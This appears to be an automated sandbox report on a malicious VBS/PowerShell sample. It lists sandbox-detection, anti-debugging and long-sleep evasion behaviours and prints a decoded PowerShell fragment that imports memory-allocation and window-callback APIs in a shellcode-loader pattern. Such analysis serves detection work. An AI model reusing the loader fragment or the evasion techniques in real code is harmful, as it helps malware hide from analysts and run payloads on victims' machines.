Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Potential evasive VBS script found (sleep loop)
Source: Initial file Initial file: For i = 1 To len(h) step 2 if i mod 21 = 0 then Wscript.Sleep(1)
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 0000000C.00000002.632377605.00000000009CE000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
Source: powershell.exe, 0000000C.00000002.639577139.0000000007621000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897383455.0000000009550000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.888436421.0000000007768000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 0000001D.00000002.897383455.0000000009550000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLBPROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLB
Source: powershell.exe, 0000001D.00000002.888004573.00000000076F0000.00000004.00000001.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6436 Thread sleep count: 117 > 30 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6436 Thread sleep time: -58500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5700 Thread sleep count: 1135 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5628 Thread sleep count: 408 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3932 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4952 Thread sleep count: 2004 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1904 Thread sleep count: 6552 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4844 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4844 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572 Thread sleep count: 2405 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572 Thread sleep count: 739 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4028 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep count: 104 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4560 Thread sleep time: -17524406870024063s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yy0zjl34.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tm43worv.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4106 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1660 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1135 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 408 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2004 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6552 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2405
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 739
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000018.00000002.877914300.0000000004C44000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 0000001D.00000002.897383455.0000000009550000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlbProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlb
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 0000001D.00000002.888004573.00000000076F0000.00000004.00000001.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*
Source: powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: ieinstal.exe, 00000014.00000002.852346191.00000000035EF000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.852441123.000000000362A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.877914300.0000000004C44000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.876865142.0000000004A60000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.879668867.0000000004883000.00000004.00000001.sdmp Binary or memory string: \m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 0000000C.00000002.632377605.00000000009CE000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
Source: powershell.exe, 0000000C.00000002.639577139.0000000007621000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897383455.0000000009550000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.888436421.0000000007768000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: wscript.exe, 00000001.00000003.466346161.00000143096B7000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 0000000C.00000002.642746702.000000000A40A000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.900526799.000000000A1FA000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 0000001D.00000002.897445303.000000000A57A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #agry Scriven systemko Tredje5 Chromi8 BIBL Overstre7 prec Forligsin2 Benefit Apotheosiz udetil LOOSE Brneve9 Tonsi2 Tropis Pleuroli4 blkk Cystice Underrepor1 Proculcat PASTOR Sang combaronfo ompr Damned8 NEPH Fruitivere DEFAITIS Miskende5 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Scriptere1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Scriptere6,ref Int32 Theoriser2,int AUTOACTIVE,ref Int32 Scriptere,int Lejni6,int Scriptere7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Pseu4,uint linjer,int STRY,int Scriptere0,int SEERNE,int Pacificer7,int Advisens9);[DllImport("kernel32.dll")]public static extern int ReadFile(int AUTOACTIVE0,uint AUTOACTIVE1,IntPtr AUTOACTIVE2,ref Int32 AUTOACTIVE3,int AUTOACTIVE4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr AUTOACTIVE5,int AUTOACTIVE6,int AUTOACTIVE7,int AUTOACTIVE8,int AUTOACTIVE9);}"@#refr Cancerinco Linguatul heale LEVIGAT LIGKISTE svovl platonismm Opdrifts Test-Path "inte" Test-Path "Haandboldh6" 